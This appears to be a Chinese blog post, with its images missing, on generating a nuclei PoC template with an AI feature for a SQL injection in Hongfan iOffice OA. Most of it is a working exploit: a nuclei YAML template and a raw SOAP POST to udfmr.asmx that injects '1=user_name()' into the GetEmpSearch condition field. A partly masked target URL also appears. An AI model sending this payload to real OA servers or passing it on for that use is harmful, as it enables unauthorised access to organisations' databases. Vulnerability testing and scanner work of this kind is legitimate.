背景

2. 项目地址

3. 自动生成yaml+浏览器快捷检验

id: hongfansql

info:
  name: 红帆oa Sql注入
  author: fkalis
  severity: high
  reference: https://blog.csdn.net/qq_41904294/article/details/132365842

http:
  - method: POST
    path:
      - "{{BaseURL}}/iOffice/prg/set/wss/udfmr.asmx"

    headers:
      Content-Type: text/xml; charset=utf-8
      SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"

    body: |
      <?xml version="1.0" encoding="utf-8"?>
      <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
          <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
            <condition>1=user_name()</condition>
          </GetEmpSearch>
        </soap:Body>
      </soap:Envelope>
    matchers:
      # Add your desired matcher(s) here, for example:
      - type: word
        words:
          - "SqlException"
        part: body
      - type: status
        status:
          - 500

有错误：

修改后：

运行poc查看效果

漏洞复现检验

POST /iOffice/prg/set/wss/udfmr.asmx HTTP/1.1
Host: your-ip
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/ioffice/udfmr/GetEmpSearch"
 
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetEmpSearch xmlns="http://tempuri.org/ioffice/udfmr">
      <condition>1=user_name()</condition>
    </GetEmpSearch>
  </soap:Body>
</soap:Envelope>

http://xxx.xxx.xxxx:9980/ioffice/

执行poc：

使用浏览器进行快捷漏洞检验

请求包

响应包

3. nuclei ai poc分享

访问分享的连接即可获取到poc

当然也可以关闭对poc的分享